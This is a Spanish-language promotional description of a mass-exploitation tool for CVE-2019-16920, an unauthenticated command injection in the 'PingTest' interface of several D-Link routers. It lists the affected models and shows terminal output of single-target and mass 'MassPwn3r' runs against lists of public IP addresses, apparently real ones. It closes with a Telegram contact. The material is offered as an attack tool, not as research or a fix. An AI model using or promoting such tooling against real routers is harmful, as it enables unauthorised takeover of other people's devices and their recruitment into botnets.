
Herramienta automatizada de explotación masiva para la vulnerabilidad de inyección de comandos CVE-2019-16920 en múltiples routers D-Link, que permite la ejecución remota de código sin autenticación.
Se encontró una vulnerabilidad en el firmware más reciente de los siguientes productos D-Link: DIR-655 DIR-866L DIR-652 DHP-1565
Se produce una ejecución remota de código no autenticada en productos D-Link como DIR-655C, DIR-866L, DIR-652 y DHP-1565. El problema ocurre cuando el atacante envía una entrada arbitraria a una interfaz de puerta de enlace común del dispositivo "PingTest" que podría conducir a una inyección de comandos común. Un atacante que logre desencadenar la inyección de comandos podría comprometer completamente el sistema. Posteriormente, se descubrió de forma independiente que también están afectados: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 y DIR-825.
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
Telegram:@eth_hacker0x18